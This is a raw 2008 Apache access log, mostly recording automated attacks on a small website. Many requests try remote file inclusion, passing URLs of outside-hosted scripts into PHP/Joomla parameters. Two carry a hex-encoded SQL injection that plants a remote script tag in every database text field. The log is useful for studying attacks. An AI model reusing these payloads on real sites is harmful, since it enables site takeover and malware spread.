207.210.99.66 - - [24/Aug/2008:03:13:18 -0500] "GET /logs/access_log.1209600000/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
207.210.99.66 - - [24/Aug/2008:03:13:18 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
207.210.99.66 - - [24/Aug/2008:03:13:18 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
69.10.154.65 - - [24/Aug/2008:03:15:05 -0500] "GET /logs/access_log.1214524800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
213.203.202.68 - - [24/Aug/2008:03:15:11 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
213.203.202.68 - - [24/Aug/2008:03:15:11 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:03:16:01 -0500] "GET /logs/access_log.1213488000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
86.58.154.237 - - [24/Aug/2008:03:16:48 -0500] "GET /logs/access_log.1214524800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
81.6.204.2 - - [24/Aug/2008:03:17:09 -0500] "GET /logs/access_log.1209600000/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
81.6.204.2 - - [24/Aug/2008:03:17:09 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.6.204.2 - - [24/Aug/2008:03:17:09 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
207.210.99.66 - - [24/Aug/2008:03:18:13 -0500] "GET /logs/access_log.1214179200/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
207.210.99.66 - - [24/Aug/2008:03:18:13 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
207.210.99.66 - - [24/Aug/2008:03:18:13 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
74.52.99.98 - - [24/Aug/2008:03:18:57 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:03:18:57 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:03:20:58 -0500] "GET /logs/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:03:20:58 -0500] "GET /libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
81.6.204.2 - - [24/Aug/2008:03:22:10 -0500] "GET /logs/access_log.1214179200/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
81.6.204.2 - - [24/Aug/2008:03:22:11 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.6.204.2 - - [24/Aug/2008:03:22:12 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
213.248.62.98 - - [24/Aug/2008:03:22:36 -0500] "GET /logs/access_log.1214524800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.65"
59.187.97.162 - - [24/Aug/2008:03:24:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://images.google.co.kr/imgres?imgurl=http://tomdolan.pconline.com/tattoo/webring.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&h=194&w=225&sz=13&hl=ko&start=585&um=1&usg=__H4U03lxdjlt841Op82e5qs0FhV8=&tbnid=fuQXIcqpCqKozM:&tbnh=93&tbnw=108&prev=/images%3Fq%3Doldschool%2Btatoo%26start%3D580%26ndsp%3D20%26um%3D1%26complete%3D1%26hl%3Dko%26lr%3D%26newwindow%3D1%26sa%3DN""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
59.187.97.162 - - [24/Aug/2008:03:24:24 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
59.187.97.162 - - [24/Aug/2008:03:24:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
59.187.97.162 - - [24/Aug/2008:03:24:24 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://images.google.co.kr/imgres?imgurl=http://tomdolan.pconline.com/tattoo/webring.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&h=194&w=225&sz=13&tbnid=fuQXIcqpCqKozM:&tbnh=93&tbnw=108&hl=ko&um=1&prev=/images%3Fq%3Doldschool%2Btatoo%26start%3D580%26ndsp%3D20%26um%3D1%26complete%3D1%26hl%3Dko%26lr%3D%26newwindow%3D1%26sa%3DN&frame=small""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
64.185.237.191 - - [24/Aug/2008:03:24:25 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:03:24:25 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
193.218.160.36 - - [24/Aug/2008:03:25:02 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.813"
193.218.160.36 - - [24/Aug/2008:03:25:02 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.813"
212.254.73.19 - - [24/Aug/2008:03:25:49 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
212.254.73.19 - - [24/Aug/2008:03:25:49 -0500] "GET //?path%5Bdocroot%5D=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
212.254.73.19 - - [24/Aug/2008:03:25:53 -0500] "GET /logs//?path%5Bdocroot%5D=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
212.241.219.5 - - [24/Aug/2008:03:26:41 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
212.241.219.5 - - [24/Aug/2008:03:26:41 -0500] "GET //?path%5Bdocroot%5D=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
212.241.219.5 - - [24/Aug/2008:03:26:42 -0500] "GET /logs//?path%5Bdocroot%5D=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
86.58.154.237 - - [24/Aug/2008:03:26:57 -0500] "GET /logs/access_log.1214438400/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
74.202.49.162 - - [24/Aug/2008:03:28:56 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
69.10.154.65 - - [24/Aug/2008:03:30:02 -0500] "GET /logs/access_log.1214438400/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
213.248.62.98 - - [24/Aug/2008:03:34:46 -0500] "GET /logs/access_log.1214438400/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.65"
219.117.239.114 - - [24/Aug/2008:03:37:50 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
219.117.239.114 - - [24/Aug/2008:03:37:50 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
66.135.41.76 - - [24/Aug/2008:03:41:24 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
66.135.41.76 - - [24/Aug/2008:03:41:24 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
212.241.219.5 - - [24/Aug/2008:03:42:21 -0500] "GET /logs/access_log.1214524800/phphtml.php?htmlclass_path=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
212.241.219.5 - - [24/Aug/2008:03:42:22 -0500] "GET /phphtml.php?htmlclass_path=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
212.241.219.5 - - [24/Aug/2008:03:42:22 -0500] "GET /logs/phphtml.php?htmlclass_path=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
212.241.219.5 - - [24/Aug/2008:03:43:56 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
70.84.182.98 - - [24/Aug/2008:03:45:11 -0500] "GET /enc/content.php?Home_Path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 299 "-""Microsoft Pocket Internet Explorer/0.6"
70.84.182.98 - - [24/Aug/2008:03:45:11 -0500] "GET /logs/enc/content.php?Home_Path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 304 "-""Microsoft Pocket Internet Explorer/0.6"
216.55.159.47 - - [24/Aug/2008:03:45:35 -0500] "GET /logs//join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
216.55.159.47 - - [24/Aug/2008:03:45:36 -0500] "GET //join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
80.93.62.114 - - [24/Aug/2008:03:48:39 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:48:39 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.52.99.98 - - [24/Aug/2008:03:54:55 -0500] "GET /logs/access_log.1206230400/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:03:54:55 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:03:54:56 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
70.84.182.98 - - [24/Aug/2008:03:55:36 -0500] "GET /index.php?openfile=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 293 "-""Microsoft Pocket Internet Explorer/0.6"
70.84.182.98 - - [24/Aug/2008:03:55:40 -0500] "GET /logs/index.php?openfile=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 298 "-""Microsoft Pocket Internet Explorer/0.6"
67.202.88.42 - - [24/Aug/2008:03:56:00 -0500] "GET //modules/Forums/admin/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:56:28 -0500] "GET /logs/access_log.1203724800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:56:28 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:56:29 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:06 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:07 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:07 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:12 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:12 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:13 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:14 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:14 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:57:35 -0500] "GET /logs/access_log.1209600000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.6.8.121 - - [24/Aug/2008:03:58:50 -0500] "GET /logs/access_log.1181174400 HTTP/1.0" 200 140843 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.93.62.114 - - [24/Aug/2008:03:59:08 -0500] "GET /logs/access_log.1203724800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:59:08 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:59:08 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:03:59:46 -0500] "GET /logs/access_log.1209600000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:02:23 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:02:23 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.18.151.242 - - [24/Aug/2008:04:02:57 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
67.18.151.242 - - [24/Aug/2008:04:02:57 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
217.20.113.117 - - [24/Aug/2008:04:03:27 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
217.20.113.117 - - [24/Aug/2008:04:03:28 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
80.93.62.114 - - [24/Aug/2008:04:03:28 -0500] "GET /logs/access_log.1203724800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:03:29 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:03:29 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.18.151.242 - - [24/Aug/2008:04:03:48 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
80.93.62.114 - - [24/Aug/2008:04:04:37 -0500] "GET /logs/access_log.1209600000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
219.117.239.114 - - [24/Aug/2008:04:05:20 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
219.117.239.114 - - [24/Aug/2008:04:05:20 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
74.6.8.121 - - [24/Aug/2008:04:06:17 -0500] "GET /logs/access_log.1199059200 HTTP/1.0" 200 111852 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.93.62.114 - - [24/Aug/2008:04:06:36 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:06:37 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:06:37 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
219.117.239.114 - - [24/Aug/2008:04:07:41 -0500] "GET /logs/errors.php?error=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
219.117.239.114 - - [24/Aug/2008:04:07:42 -0500] "GET /errors.php?error=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
69.246.218.226 - - [24/Aug/2008:04:08:03 -0500] "GET /logs/access_log.1201824000?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 238885 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
69.246.218.226 - - [24/Aug/2008:04:08:33 -0500] "GET /logs/access_log.1201824000?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 238885 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
80.93.62.114 - - [24/Aug/2008:04:10:37 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:10:37 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.15.80.42 - - [24/Aug/2008:04:16:57 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.15.80.42 - - [24/Aug/2008:04:16:58 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
202.228.204.130 - - [24/Aug/2008:04:19:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:19:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:19:04 -0500] "GET //?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:19:05 -0500] "GET //?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
74.6.8.121 - - [24/Aug/2008:04:20:05 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [24/Aug/2008:04:20:05 -0500] "GET /logs/access_log.1212883200 HTTP/1.0" 200 303554 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
